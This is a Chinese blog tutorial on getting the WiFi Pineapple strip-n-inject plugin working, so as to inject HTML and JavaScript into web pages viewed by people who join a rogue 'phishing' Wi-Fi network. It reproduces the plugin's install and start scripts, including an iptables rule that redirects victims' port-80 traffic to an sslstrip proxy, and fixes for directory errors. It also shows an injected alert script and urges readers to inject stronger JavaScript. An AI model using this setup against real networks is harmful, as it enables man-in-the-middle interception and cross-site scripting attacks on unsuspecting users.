WIFI菠萝 strip-n-inject插件安装与使用

WIFI菠萝有一个strip-n-inject插件。可以在其他人连上钓鱼WIFI浏览网页时,在其网页源码末尾插入文字。当然包括HTML标签和Javascript代码。所以可以做到XSS攻击。


而一开始将strip-n-inject插件放到/pineapple/components/infusions/目录,打开Web页面,点Install按钮,一般是安装不成功的。

WIFI菠萝 strip-n-inject插件安装与使用_第1张图片


于是看了一下它的安装脚本:

/pineapple/components/infusions/strip-n-inject/includes/install.sh

#!/bin/sh

installed="0"

# install deps
opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web && installed="1"

if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
fi

if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
fi

if [ "${installed}" == "1" ]; then
  touch installed
fi

从第六行可以看出,安装时卸载了twisted-web,然后又安装了一遍twisted-web。“twisted-web”是Python的一个Web应用开发框架。而WIFI菠萝也确实存在twisted-web。所以可以直接创建”installed“文件表示已安装。

# touch /pineapple/components/infusions/strip-n-inject/includes/installed


刷新网页后就显示安装好了。

WIFI菠萝 strip-n-inject插件安装与使用_第2张图片


不过只是点Start还是显示”Strip-N-Inject is not running...“。


原因很简单,插件运行时执行了/pineapple/components/infusions/strip-n-inject/includes/proxy/sslstrip.py脚本,并带上”/sd/tmp/proxy_inject.log“参数。显然,”/sd/tmp/“目录并不存在。


所以,我们可以创建这个目录:

# mkdir /sd/tmp


或者我们改动插件,指向”/tmp/“目录。

涉及到保存目录的文件有两个:include/data.php、include/start.sh。

include/data.php

只要更改14行,去掉两个”/sd“。

include/start.sh 

#!/bin/bash

# setup vars
export PATH=$PATH:/sd/usr/bin:/sd/usr/sbin
attacker_ip="$(cat proxy/attacker_ip.txt)"

# set our iptables redirect
iptables -t nat -A PREROUTING ! -s "${attacker_ip}" -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

# start sslstrip/inject proxy
cd proxy
python sslstrip.py -s -k -f -w /sd/tmp/proxy_inject.log 2>&1 | at now &

exit 0 
同样更改倒数第三行就可以了。


然后我们Start一下。

WIFI菠萝 strip-n-inject插件安装与使用_第3张图片

成功了。



然后就可以开始使用了。

点”Injection Code“,然后可以在文本框中输入要注入的内容。比如JavaScript代码:

很简单,就是弹出写有”哈哈哈。“的对话框。

WIFI菠萝 strip-n-inject插件安装与使用_第4张图片


注意”Attacker IP“填好自己IP地址。当然,如果你在WIFI菠萝的父网段中也可以不设置。然后点Start


当其他人连上钓鱼WIFI并访问HTTP网页时(HTTPS没有):

WIFI菠萝 strip-n-inject插件安装与使用_第5张图片


当然也可以注入HTML标签:

WIFI菠萝 strip-n-inject插件安装与使用_第6张图片


WIFI菠萝 strip-n-inject插件安装与使用_第7张图片


当然远不止这样,你可以注入更牛逼的JS脚本。


如有谬误,望加指正。

转载注明出处:http://blog.csdn.net/qq_15983713/article/details/50242309

你可能感兴趣的:(WIFI菠萝,Linux,WIFI菠萝,XSS,网络安全)